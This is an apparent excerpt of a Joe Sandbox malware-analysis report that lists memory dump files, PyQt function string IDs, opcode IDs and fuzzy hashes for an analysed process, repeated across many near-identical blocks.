                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QTextObject$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-1060806450
                                                                                                                                                                                                                                          • Opcode ID: ebfc3d5c89b35dc673228e2b129ee55a09ba52fe50448dade6ded0eb12e88c7e
                                                                                                                                                                                                                                          • Instruction ID: ee649aeaadd61317f008ac6fea6a8af81b4970ecc50d9a1690eb970688500627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebfc3d5c89b35dc673228e2b129ee55a09ba52fe50448dade6ded0eb12e88c7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5321E633A09B46D6EA609B15E8842AA73E4FB84FC4F544132EACE47768EF3CE155C744
                                                                                                                                                                                                                                          Function 00007FF89D9ABD00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegularExpressionValidator$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-2457261612
                                                                                                                                                                                                                                          • Opcode ID: db07c2a51806eaf166a5c7dfe4288f09fbf0b85e4b905087e9764f801428060e
                                                                                                                                                                                                                                          • Instruction ID: f9a23aa2cb61318f3db674207fef4afacdf10c33242c6eb36d9df34ba03734c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db07c2a51806eaf166a5c7dfe4288f09fbf0b85e4b905087e9764f801428060e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E21F573A09A4686EA608B15E88426A73E4FB84FC4F444132EACF43768EF3CE155C744
                                                                                                                                                                                                                                          Function 00007FF89D9AFD40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QTextFrame$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-3280819144
                                                                                                                                                                                                                                          • Opcode ID: 04a01cd2017839ce9634384e4cc83156e7a22728c5a4878d2b2d06df41850e4b
                                                                                                                                                                                                                                          • Instruction ID: 833b1c2c3e9e9c0707d1c405ea99aeb75f5bc3f82015ec0f2633dec298b8a462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04a01cd2017839ce9634384e4cc83156e7a22728c5a4878d2b2d06df41850e4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4210833A09B4696EA208B15E84526A73E4FB85FC4F544132EACE47B34EF3CE555C704
                                                                                                                                                                                                                                          Function 00007FF89D982090 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ9$QPdfWriter$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                                          • API String ID: 59943102-2057804258
                                                                                                                                                                                                                                          • Opcode ID: 4fd71151551caa592b0c3a82bd9b7592f0ac0997c56de8fc6813afa3305eac3d
                                                                                                                                                                                                                                          • Instruction ID: 260b9b30273b981b721aa5615cc357034a608f4502a5ddb32857320908c25ef4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd71151551caa592b0c3a82bd9b7592f0ac0997c56de8fc6813afa3305eac3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3211733A09B46C6EA208B15E88526A73E4FB94FC4F544132EACE03724EF3CE555C704
                                                                                                                                                                                                                                          Function 00007FF89D9AC0E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRegularExpressionValidator$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-202952084
                                                                                                                                                                                                                                          • Opcode ID: 8c300a57845e0b3d1acf504f25ddc19604b6b2e94e592a42f14ebf32771935d7
                                                                                                                                                                                                                                          • Instruction ID: 826a38eded0bfad5b344da1073fb015f3c1efa65fd06685193ac4664a0e2adf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c300a57845e0b3d1acf504f25ddc19604b6b2e94e592a42f14ebf32771935d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9210637A09A4686EA208B15E88526A73E4FB94FC4F444136EACE07728EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D96BFA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QTextTable$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-2939353444
                                                                                                                                                                                                                                          • Opcode ID: b8224210fe4a3103645e9bf7bcea15d8c4baecafd138e21e45e35d2a50da8d93
                                                                                                                                                                                                                                          • Instruction ID: 8c79047e9d4e626cba91d8437da66a583dfbd34e51c7b9de4a6b7cb98225a1fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8224210fe4a3103645e9bf7bcea15d8c4baecafd138e21e45e35d2a50da8d93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C721E833A09A46D6EA209B25E44526A77E4FB84FC4F444132EACE43774EF3CE555CB04
                                                                                                                                                                                                                                          Function 00007FF89D9ADF80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?tabletEvent@Event@@@TabletWindow@@
                                                                                                                                                                                                                                          • String ID: BJ8$QRasterWindow$mouseReleaseEvent$mouseReleaseEvent(self, a0: Optional[QMouseEvent])
                                                                                                                                                                                                                                          • API String ID: 2314446140-4289977624
                                                                                                                                                                                                                                          • Opcode ID: dc242274f4ad0dbe309eef7a04d99ee5fe953c688ca5094924f5f560442eb592
                                                                                                                                                                                                                                          • Instruction ID: 965c710fd43991300f3fd41e90d46b215ad02871115b736e9c375239dd9323c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc242274f4ad0dbe309eef7a04d99ee5fe953c688ca5094924f5f560442eb592
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D521D733A09B4686EA608B15E88526A77E4FB84FC4F544132EACE43764EF3CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D93DF80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                                          • String ID: BJ8$QStandardItemModel$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                                          • API String ID: 59943102-742182
                                                                                                                                                                                                                                          • Opcode ID: 96ded619784c3e1cc0f4241da96bbd7ab9a6639d78d60527a8098500093f09dd
                                                                                                                                                                                                                                          • Instruction ID: ce08dac04194e5f7d12154c192c9829719f858070e74040a8e6a923d4a0f37a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ded619784c3e1cc0f4241da96bbd7ab9a6639d78d60527a8098500093f09dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8021F973A08A46C6EA609B25E48426AB7E4FB94FC4F444132EACE43724EF2CE155D744
                                                                                                                                                                                                                                          Function 00007FF89D973FC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
